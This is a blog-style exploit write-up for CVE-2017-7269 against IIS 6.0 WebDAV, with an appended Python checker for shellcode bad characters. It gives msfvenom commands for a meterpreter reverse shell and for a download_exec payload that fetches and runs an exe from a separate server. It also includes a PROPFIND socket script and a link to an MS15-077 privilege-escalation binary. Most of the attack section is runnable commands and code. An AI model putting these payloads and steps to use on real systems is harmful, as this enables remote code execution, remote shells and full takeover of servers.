Writing a CVE-2017-7269 (IIS 6.0) EXP

Published 2017-03-29 | Category: Exploitation

Straight to the point. The test environment is `Windows Server 2003 R2 Enterprise Edition SP2 x86`.

![image_1bccub7e11kjg12de1cfeao5ig29.png-43.2kB][1]

First, debug the [PoC][2]:

![image_1bccunicd1uln1n0k1n7l1qua1dkom.png-159.1kB][3]

Breaking at the point where the shellcode starts executing, I could see that the shellcode had all been converted to `unicode` encoding and that `ESI` pointed to the start of the shellcode. So at this step I knew I could use the `x86/unicode_upper` encoder in `msfvenom` with `BufferRegister` set to `ESI` to generate the shellcode. I generated one to test:

```
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.194.139 LPORT=4444 -e x86/unicode_upper BufferRegister=ESI -f python
```

But executing the shellcode crashed:

![image_1bcd0qt101j0vhp57vikkq1g3s13.png-144.8kB][4]

Because the address `ebp` points to is not accessible, I treated `\x55` as a bad character to raise the success rate of the generated shellcode and encoded with `x86/unicode_mixed` instead; that produced reasonably stable shellcode. The next pitfall was that the reverse shell dropped as soon as it connected. I asked a pentester colleague here, who suggested first `download`ing an `exe` payload and then executing it. So I first generated an `exe` payload and put it on a server:

```
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.194.139 LPORT=4444 -e x86/unicode_mixed BufferRegister=ESI -b '\x55' -f exe > reverse.exe
```

Then generate the `download_exec` shellcode. Note in particular that **the save path must be writable**; I asked the pentester again, and any user has write permission to the `C://RECYCLER` directory:

```
msfvenom -a x86 --platform windows -p windows/download_exec EXE="C://RECYCLER//reverse.exe" URL="http://10.26.71.36/reverse.exe" -e x86/unicode_mixed BufferRegister=ESI -b '\x55' -f python
```

After generating it, replace the original shellcode:

```
import socket

# Target IIS 6.0 host in the test environment, WebDAV on port 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.194.135', 80))

# PROPFIND request; the overflow is reached through the If: header
pay = b'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += b'If: '
# The If: header tokens that carry the encoded shellcode are not reproduced on this page
pay += b' (Not ) \r\n\r\n'
print(pay)
sock.sendall(pay)
data = sock.recv(80960)
print(data)
sock.close()
```

Finally, sending the payload gave a stable reverse shell:

![image_1bcd2930s1ejn1nse16pe18et1hjr2n.png-817.5kB][5]

Next, escalate privileges, here using the `MS15-077` EXP:

![2017-03-30_095853.png-1290.2kB][6]

Privilege escalation EXP: [https://github.com/birdg0/exp/blob/master/local/windows/ms15-077.exe][7]

[1]: http://static.zybuluo.com/birdg0/ddbt7i9kmhwgbouwril1g9l3/image_1bccub7e11kjg12de1cfeao5ig29.png
[2]: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py
[3]: http://static.zybuluo.com/birdg0/1fr4b4mm8batuk12r4ulnyy0/image_1bccunicd1uln1n0k1n7l1qua1dkom.png
[4]: http://static.zybuluo.com/birdg0/w7il54i1b6axxnc7uj7o57d8/image_1bcd0qt101j0vhp57vikkq1g3s13.png
[5]: http://static.zybuluo.com/birdg0/jp212q6i170xefb1ypt2wbzv/image_1bcd2930s1ejn1nse16pe18et1hjr2n.png
[6]: http://static.zybuluo.com/birdg0/qcmzzwsvrq5tvywi9hvjp9mi/2017-03-30_095853.png
[7]: https://github.com/birdg0/exp/blob/master/local/windows/ms15-077.exe
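As an added example that is not part of the original post or of the exploit repository: the shellcode generation step above depends on the encoded payload surviving the server's widening of the header to UTF-16 and on avoiding the bytes that made the first attempt crash, and the `-b '\x55'` option bans a byte that is both ASCII `U` and the `push ebp` opcode. The helper below reassembles the payload from msfvenom `-f python` output, simulates the widening seen in the debugger, and reports every byte that falls outside the encoder's expected alphabet or hits the bad-character list, so the check can be run before the request is sent. The alphabets assumed for `x86/unicode_upper` (uppercase alphanumerics) and `x86/unicode_mixed` (mixed-case alphanumerics) are assumptions for this check, the `buf = b""` / `buf += b"..."` line shape is an assumption about the output format, and the sample text is constructed, not real encoder output.

```python
import ast
import re
import string

# Expected output alphabets for the two encoders named on the page. These are
# assumptions made for this check (uppercase alphanumerics for unicode_upper,
# mixed-case alphanumerics for unicode_mixed), not Metasploit's own definitions.
ALPHABETS = {
    "x86/unicode_upper": frozenset((string.ascii_uppercase + string.digits).encode()),
    "x86/unicode_mixed": frozenset((string.ascii_letters + string.digits).encode()),
}

# Matches the `buf =  b""` / `buf += b"\x.."` lines of msfvenom -f python output
# (assumed line shape; older versions omit the b prefix, which is also accepted).
_BUF_LINE = re.compile(r'^\s*buf\s*\+?=\s*(b?"(?:[^"\\]|\\.)*")\s*$')

# Constructed sample in the shape of msfvenom -f python output; NOT real encoder
# output. It deliberately contains 0x55 ('U', push ebp) and a 0x00 byte.
SAMPLE_MSFVENOM_OUTPUT = r'''buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x51\x41\x54\x41\x58\x41\x5a\x41\x50\x41\x33\x51"
buf += b"\x55\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x00\x4c"
'''


def parse_msfvenom_python(text):
    """Reassemble the payload bytes from msfvenom `-f python` output."""
    out = bytearray()
    for line in text.splitlines():
        m = _BUF_LINE.match(line)
        if not m:
            continue  # skip comments, blank lines, anything that is not a buf line
        chunk = ast.literal_eval(m.group(1))
        if isinstance(chunk, str):  # Python 2 style output without the b prefix
            chunk = chunk.encode("latin-1")
        out += chunk
    return bytes(out)


def widen_to_utf16le(buf):
    """Simulate the ASCII-to-UTF-16LE expansion (each byte becomes byte, 0x00).

    This is what "the shellcode was converted to unicode" means in the
    debugger screenshot: the unicode encoders are built so that the widened
    buffer is still executable starting at the register given as BufferRegister.
    """
    return buf.decode("latin-1").encode("utf-16-le")


def find_violations(buf, encoder, badchars=b""):
    """Return (offset, byte) pairs outside the encoder alphabet or in badchars."""
    allowed = ALPHABETS[encoder]
    return [(i, b) for i, b in enumerate(buf) if b not in allowed or b in badchars]


if __name__ == "__main__":
    buf = parse_msfvenom_python(SAMPLE_MSFVENOM_OUTPUT)
    print("payload length:", len(buf), "-> widened:", len(widen_to_utf16le(buf)))
    # Without the bad-character list, 'U' (0x55) passes the unicode_upper alphabet
    print("unicode_upper, no badchars:", find_violations(buf, "x86/unicode_upper"))
    # With -b '\x55' the same byte is reported alongside the stray 0x00
    print("unicode_mixed, -b '\\x55':", find_violations(buf, "x86/unicode_mixed", b"\x55"))
```

Run it on a real `-f python` listing by replacing the constructed sample; an empty list from `find_violations` with the same `-b` bytes you passed to msfvenom is the condition to insist on before pasting the payload into the request.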